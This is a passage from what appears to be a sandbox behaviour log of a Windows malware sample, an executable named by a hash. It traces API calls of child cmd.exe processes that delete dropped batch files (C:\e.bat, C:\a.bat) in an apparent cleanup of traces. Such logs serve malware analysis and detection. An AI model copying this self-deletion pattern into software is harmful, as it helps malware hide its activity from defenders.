lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.293] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.293] RegCloseKey (hKey=0x88) returned 0x0 [0144.293] time (in: timer=0x0 | out: timer=0x0) returned 0x623441fe [0144.293] srand (_Seed=0x623441fe) [0144.293] GetCommandLineW () returned="cmd.exe /c \"del C:\\e.bat\"" [0144.293] GetCommandLineW () returned="cmd.exe /c \"del C:\\e.bat\"" [0144.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.293] GetProcessHeap () returned 0x580000 [0144.293] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x210) returned 0x586f68 [0144.293] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x586f70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0144.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0144.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.294] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.294] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.294] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.294] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.294] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.294] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.294] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.294] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.294] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.294] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.294] GetProcessHeap () returned 0x580000 [0144.295] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x5889d8) returned 1 [0144.297] GetEnvironmentStringsW () returned 0x587fb0* [0144.297] GetProcessHeap () returned 0x580000 [0144.297] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa32) returned 0x58a868 [0144.297] FreeEnvironmentStringsA (penv="A") returned 1 [0144.297] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0144.297] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.297] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.297] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.297] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.297] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.297] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.298] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.298] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.298] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.298] GetProcessHeap () returned 0x580000 [0144.298] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x44) returned 0x587180 [0144.298] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.298] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0144.298] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.298] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5871d0 [0144.298] FindClose (in: hFindFile=0x5871d0 | out: hFindFile=0x5871d0) returned 1 [0144.299] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5871d0 [0144.299] FindClose (in: hFindFile=0x5871d0 | out: hFindFile=0x5871d0) returned 1 [0144.299] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0144.299] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5871d0 [0144.299] FindClose (in: hFindFile=0x5871d0 | out: hFindFile=0x5871d0) returned 1 [0144.299] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0144.299] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0144.299] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0144.299] GetProcessHeap () returned 0x580000 [0144.300] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58a868) returned 1 [0144.300] GetEnvironmentStringsW () returned 0x587fb0* [0144.300] GetProcessHeap () returned 0x580000 [0144.300] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa76) returned 0x589e28 [0144.300] FreeEnvironmentStringsA (penv="=") returned 1 [0144.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.300] GetProcessHeap () returned 0x580000 [0144.300] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x587180) returned 1 [0144.300] GetProcessHeap () returned 0x580000 [0144.300] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x400e) returned 0x58bd28 [0144.301] GetProcessHeap () returned 0x580000 [0144.301] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x587180 [0144.301] GetProcessHeap () returned 0x580000 [0144.301] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x4008) returned 0x58fd40 [0144.301] GetProcessHeap () returned 0x580000 [0144.301] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x4008) returned 0x593d50 [0144.302] _wcsnicmp (_String1="del ", _String2="cmd ", _MaxCount=0x4) returned 1 [0144.303] GetProcessHeap () returned 0x580000 [0144.303] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x418) returned 0x58a8a8 [0144.303] SetErrorMode (uMode=0x0) returned 0x8003 [0144.303] SetErrorMode (uMode=0x1) returned 0x0 [0144.303] GetFullPathNameW (in: lpFileName="del C:\\.", nBufferLength=0x208, lpBuffer=0x58a8b0, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\del C:", lpFilePart=0x19fbac*="del C:") returned 0x24 [0144.303] SetErrorMode (uMode=0x8003) returned 0x1 [0144.303] GetProcessHeap () returned 0x580000 [0144.303] RtlReAllocateHeap (Heap=0x580000, Flags=0x0, Ptr=0x58a8a8, Size=0x5e) returned 0x58a8a8 [0144.303] GetProcessHeap () returned 0x580000 [0144.303] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x58a8a8) returned 0x5e [0144.303] NeedCurrentDirectoryForExePathW (ExeName="del C:\\.") returned 1 [0144.303] GetProcessHeap () returned 0x580000 [0144.303] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x58) returned 0x5871b8 [0144.303] GetProcessHeap () returned 0x580000 [0144.303] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa4) returned 0x58a910 [0144.304] GetProcessHeap () returned 0x580000 [0144.304] RtlReAllocateHeap (Heap=0x580000, Flags=0x0, Ptr=0x58a910, Size=0x58) returned 0x58a910 [0144.304] GetProcessHeap () returned 0x580000 [0144.304] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x58a910) returned 0x58 [0144.304] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.304] GetProcessHeap () returned 0x580000 [0144.304] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xe0) returned 0x58a970 [0144.308] GetProcessHeap () returned 0x580000 [0144.308] RtlReAllocateHeap (Heap=0x580000, Flags=0x0, Ptr=0x58a970, Size=0x76) returned 0x58a970 [0144.308] GetProcessHeap () returned 0x580000 [0144.308] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x58a970) returned 0x76 [0144.308] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.308] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\del C:\\e.bat", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0144.308] GetLastError () returned 0x7b [0144.308] GetProcessHeap () returned 0x580000 [0144.309] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58fd40) returned 1 [0144.309] GetProcessHeap () returned 0x580000 [0144.309] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x593d50) returned 1 [0144.309] GetProcessHeap () returned 0x580000 [0144.309] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58bd28) returned 1 [0144.310] GetConsoleOutputCP () returned 0x1b5 [0144.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.313] GetUserDefaultLCID () returned 0x409 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0144.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0144.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0144.315] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0144.315] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0144.315] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.316] GetProcessHeap () returned 0x580000 [0144.316] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20c) returned 0x58a9f0 [0144.317] GetConsoleTitleW (in: lpConsoleTitle=0x58a9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.327] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.327] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0144.327] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0144.327] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0144.328] GetProcessHeap () returned 0x580000 [0144.328] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x400a) returned 0x58bd28 [0144.328] GetProcessHeap () returned 0x580000 [0144.329] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58bd28) returned 1 [0144.331] _wcsicmp (_String1="del", _String2=")") returned 59 [0144.331] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0144.331] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0144.331] _wcsicmp (_String1="IF", _String2="del") returned 5 [0144.331] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0144.331] _wcsicmp (_String1="REM", _String2="del") returned 14 [0144.331] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0144.331] GetProcessHeap () returned 0x580000 [0144.331] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x58) returned 0x58ac08 [0144.331] GetProcessHeap () returned 0x580000 [0144.331] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x10) returned 0x587260 [0144.331] GetProcessHeap () returned 0x580000 [0144.331] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1c) returned 0x587e60 [0144.332] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.334] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0144.334] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0144.334] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0144.334] GetProcessHeap () returned 0x580000 [0144.335] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x58ac68 [0144.335] GetProcessHeap () returned 0x580000 [0144.335] RtlReAllocateHeap (Heap=0x580000, Flags=0x0, Ptr=0x58ac68, Size=0x1c) returned 0x58ac68 [0144.335] GetProcessHeap () returned 0x580000 [0144.335] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x58ac68) returned 0x1c [0144.335] GetProcessHeap () returned 0x580000 [0144.335] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x58ac90 [0144.336] GetProcessHeap () returned 0x580000 [0144.336] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x58acc0 [0144.336] GetProcessHeap () returned 0x580000 [0144.336] RtlReAllocateHeap (Heap=0x580000, Flags=0x0, Ptr=0x58acc0, Size=0x1c) returned 0x58acc0 [0144.337] GetProcessHeap () returned 0x580000 [0144.337] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x58acc0) returned 0x1c [0144.337] GetProcessHeap () returned 0x580000 [0144.337] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1a) returned 0x58ace8 [0144.337] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f818 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.337] GetProcessHeap () returned 0x580000 [0144.337] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x38) returned 0x58ad10 [0144.337] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e888 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.337] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19eac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0144.337] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0144.337] GetProcessHeap () returned 0x580000 [0144.337] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x58ad50 [0144.337] GetProcessHeap () returned 0x580000 [0144.337] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x258) returned 0x58ad88 [0144.338] _wcsicmp (_String1="e.bat", _String2=".") returned 55 [0144.338] _wcsicmp (_String1="e.bat", _String2="..") returned 55 [0144.338] GetFileAttributesW (lpFileName="C:\\e.bat" (normalized: "c:\\e.bat")) returned 0xffffffff [0144.338] GetLastError () returned 0x2 [0144.338] GetProcessHeap () returned 0x580000 [0144.338] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x210) returned 0x58afe8 [0144.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x58aff0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.338] SetErrorMode (uMode=0x0) returned 0x8003 [0144.338] SetErrorMode (uMode=0x1) returned 0x0 [0144.338] GetFullPathNameW (in: lpFileName="C:\\e.bat", nBufferLength=0x104, lpBuffer=0x19eee8, lpFilePart=0x19eebc | out: lpBuffer="C:\\e.bat", lpFilePart=0x19eebc*="e.bat") returned 0x8 [0144.338] SetErrorMode (uMode=0x8003) returned 0x1 [0144.338] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0144.338] GetProcessHeap () returned 0x580000 [0144.338] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x258) returned 0x5805c8 [0144.338] _wcsicmp (_String1="e.bat", _String2=".") returned 55 [0144.338] _wcsicmp (_String1="e.bat", _String2="..") returned 55 [0144.338] GetFileAttributesW (lpFileName="C:\\e.bat" (normalized: "c:\\e.bat")) returned 0xffffffff [0144.339] GetLastError () returned 0x2 [0144.339] GetProcessHeap () returned 0x580000 [0144.339] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x14) returned 0x587810 [0144.339] GetProcessHeap () returned 0x580000 [0144.339] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x10) returned 0x58b200 [0144.339] GetProcessHeap () returned 0x580000 [0144.339] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x10) returned 0x58b218 [0144.339] GetProcessHeap () returned 0x580000 [0144.339] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x808) returned 0x587fb0 [0144.339] FindFirstFileExW (in: lpFileName="C:\\e.bat", fInfoLevelId=0x0, lpFindFileData=0x587fbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x587fbc) returned 0xffffffff [0144.339] GetLastError () returned 0x2 [0144.339] _get_osfhandle (_FileHandle=2) returned 0x13c [0144.339] GetFileType (hFile=0x13c) returned 0x2 [0144.339] GetStdHandle (nStdHandle=0xfffffff4) returned 0x13c [0144.339] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x19f4bc | out: lpMode=0x19f4bc) returned 0 [0144.339] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0xf47940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0144.341] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0xf47940, nSize=0x2000, Arguments=0x19f53c | out: lpBuffer="Could Not Find C:\\e.bat\r\n") returned 0x19 [0144.341] _get_osfhandle (_FileHandle=2) returned 0x13c [0144.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Could Not Find C:\\e.bat\r\n", cchWideChar=-1, lpMultiByteStr=0xf4b960, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Could Not Find C:\\e.bat\r\n", lpUsedDefaultChar=0x0) returned 26 [0144.342] WriteFile (in: hFile=0x13c, lpBuffer=0xf4b960*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19f4dc, lpOverlapped=0x0 | out: lpBuffer=0xf4b960*, lpNumberOfBytesWritten=0x19f4dc*=0x19, lpOverlapped=0x0) returned 1 [0144.342] GetProcessHeap () returned 0x580000 [0144.342] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58b218) returned 1 [0144.342] GetProcessHeap () returned 0x580000 [0144.342] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x587810) returned 1 [0144.342] GetProcessHeap () returned 0x580000 [0144.342] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58b200) returned 1 [0144.342] GetProcessHeap () returned 0x580000 [0144.343] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x587fb0) returned 1 [0144.343] GetProcessHeap () returned 0x580000 [0144.343] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x5805c8) returned 1 [0144.343] GetProcessHeap () returned 0x580000 [0144.344] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58afe8) returned 1 [0144.344] GetProcessHeap () returned 0x580000 [0144.344] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58ad88) returned 1 [0144.344] GetProcessHeap () returned 0x580000 [0144.346] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58ad50) returned 1 [0144.347] GetProcessHeap () returned 0x580000 [0144.347] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58ad10) returned 1 [0144.347] GetProcessHeap () returned 0x580000 [0144.347] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58ace8) returned 1 [0144.347] GetProcessHeap () returned 0x580000 [0144.347] RtlFreeHeap (HeapHandle=0x580000, Flags=0x0, BaseAddress=0x58acc0) returned 1 [0144.347] _get_osfhandle (_FileHandle=1) returned 0x130 [0144.347] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0144.348] _get_osfhandle (_FileHandle=1) returned 0x130 [0144.348] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0144.348] _get_osfhandle (_FileHandle=0) returned 0x158 [0144.348] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0144.348] GetConsoleOutputCP () returned 0x1b5 [0144.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.352] exit (_Code=0) Thread: id = 122 os_tid = 0x554 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x511e8000" os_pid = "0xf44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"del C:\\a.bat\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1229 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1230 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1231 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1232 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1233 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1234 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1235 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1236 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1237 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1238 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1239 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename 